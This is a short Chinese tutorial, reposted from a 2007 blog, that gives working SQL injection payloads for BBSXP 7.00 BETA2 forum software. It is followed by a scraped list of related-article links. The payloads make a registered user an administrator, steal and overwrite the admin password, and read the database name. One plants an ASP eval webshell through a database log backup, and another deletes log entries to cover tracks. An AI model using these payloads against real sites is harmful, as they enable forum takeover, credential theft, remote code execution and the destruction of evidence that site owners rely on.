芊芊做的教程
这里记录一下:
  注册---->发帖---->编辑(抓包提交)

define:cnsapc为注册用户
          bug为帖子内容

提升为管理员:
&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'--

获取后台密码"
&cnsapc=bug','');update bbsxp_users set usermail=(select adminpassword from bbsxp_sitesettings) where username='cnsapc'--

修改后台密码:
&cnsapc=bug','');update bbsxp_sitesettings set adminpassword='md5密码'--        注意:bbsxp经过md5加密的密码字母都是大写的

获得数据库名:
&cnsapc=bug','');update bbsxp_users set usermail=db_name() where username='cnsapc'--

log备份拿webshell:
&alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--

清除日志:
&delete * from bbsxp_log where username='cnsapc'--

转载于:https://www.cnblogs.com/allyesno/archive/2007/06/25/794307.html

关于BBSXP 7.00 BETA2 SQL通杀教程相关推荐

  1. 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...

    刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...

  2. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  3. recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)

    漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...

  4. Espcms通杀SQL注入漏洞分析(附EXP)

    漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay 博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有 ...

  5. X86逆向教程2:提取按钮通杀特征码

    本章我们将学习特征码的提取与定位,特征码是软件中一段固定的具有标志性的代码片段,特征码的用途非常广泛,最常见的就是杀毒软件的查杀了,查杀就是根据特征码定位技术实现的,再比如木马的免杀也是修改了特征码的 ...

  6. 某彩虹资源共享通杀漏洞

    任意文件读取是属于文件操作漏洞的一种. 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要. 是的你没看错,通杀0day 在某天上课的时候闲着,音乐老师放着好运来,好机会啊,赶紧挖个洞看看,接着 ...

  7. iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day

    IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样.使用iis7.0的注意了.临时解决办法:关闭cgi.fix_pathinfo为0 Nginx好像又爆0day了,windows下可 ...

  8. 恶意软件伪装成系统更新,通杀Win Mac Linux三大系统,隐藏半年才被发现

    晓查 发自 凹非寺 量子位 | 公众号 QbitAI 能同时攻击Windows.Mac.Linux三大操作系统的恶意软件出现了. 虽然"全平台通杀"病毒并不常见,但是安全公司Int ...

  9. 人类已无法阻挡AI?围棋后AI再破最强人类堡垒,通杀智力比赛

    据美国<科学>杂志报道,一部名叫Pluribus的计算机人工智能程序又突破了人类的一个智力领域--6人德州扑克,这标志着计算机已经通杀了人类主流的棋牌智力比赛. 在卡内基梅隆大学担任计算机 ...

最新文章

  1. 基于OpenCasCade的程序发布问题
  2. YEP共享平台释放宜人贷无限潜力
  3. Oracle 内、外连接
  4. Python 计算机视觉(三)—— 数字图像处理基本操作
  5. 【maven】mvn -pl 指定模块
  6. ContextLoaderListener.contextInitialized - how is WebApplicationContext created
  7. ArcGIS API for Silverlight地图加载众多点时,使用Clusterer解决重叠问题
  8. React 父组件(hooks)调用子组件(calss)方法
  9. 移动开发学习记录点滴-动态增加列表行数据
  10. com.jacob.com.ComFailException: Can‘t get object clsid from progid
  11. zw版【转发·台湾nvp系列Delphi例程】HALCON HistoToThresh1
  12. 浅谈UWB室内定位(三)
  13. iOS报错:linker command failed with exit code 1 (use -v to see invocation) 问题解决方式之一
  14. [转]C#:手把手教你用C#打包应用程序(安装程序卸载程序)
  15. 对比两个文件内容差异VS Visual Studio Code
  16. 数据结构之红黑树插入详解
  17. 【剑指Offer学习】【所有面试题汇总】
  18. Windows电脑上最好的3个azw3阅读器
  19. 腾讯云服务器价格表在哪里查看?
  20. tplink显示网络连接已断开_解决tplink路由器断网的问题

热门文章

  1. html2canvas 把h5网页保存为图片 区域保存
  2. 简单总结笔试和面试中的海量数据问题
  3. mysql 错误号1553 MySQL Cannot drop index needed in a foreign key constraint,外键也会创建索引
  4. 产品包装设计怎么分类
  5. 【Linux】proc详解
  6. java替换字符串中的 “ 双引号 并添加正 斜杠 \)
  7. 达梦数据库(dm8)导出sql文件
  8. linux服务器 木马 处理,linux 服务器中木马及木马清除
  9. 使用wx模块写一个微信自动回复的python代码
  10. android手机截屏、录屏脚本